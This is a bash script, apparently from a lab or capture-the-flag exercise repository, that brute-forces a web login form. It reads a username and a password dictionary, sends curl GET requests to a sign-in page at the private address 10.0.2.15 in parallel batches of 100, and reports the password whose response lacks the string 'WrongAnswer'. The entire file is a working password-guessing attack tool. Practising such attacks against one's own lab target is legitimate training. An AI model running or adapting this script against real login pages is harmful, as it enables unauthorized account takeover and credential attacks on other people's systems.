blob: 8f775789cd2315aadb0220ce9d014d64fdce759d (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
#!/usr/bin/bash
set -o nounset
set -o errexit
username="${1:?username argument missing}"
dict="${2:?password dictionary argument missing}"
mapfile -t passwords <"$dict"
OUT_FILE=$(mktemp)
test_pass() {
username="$1"
password="$2"
# Password and username has to be urlencoded
curl --get \
--silent \
--data-urlencode username="${username}" \
--data-urlencode password="${password}" \
"http://10.0.2.15/?page=signin&Login=Login#" |
grep --quiet "WrongAnswer"
}
BATCH_SIZE=100
echo "Testing all passwords in \"$dict\" with username \"$username\" in batches of $BATCH_SIZE."
password_count=${#passwords[@]}
((password_count--))
while ((password_count >= 0)); do
tmp=$BATCH_SIZE
while ((tmp-- > 0 && password_count >= 0)); do
{
pass="${passwords[password_count]}"
if ! test_pass "$username" "$pass"; then
echo "$pass" >"$OUT_FILE"
fi
} &
((password_count--))
done
echo "Waiting for batch to finish…"
wait
echo "$((password_count + 1)) passwords left"
if [ -s "$OUT_FILE" ]; then
echo "Password found: $(cat "$OUT_FILE")"
exit
fi
done
echo "Password not found :("
|
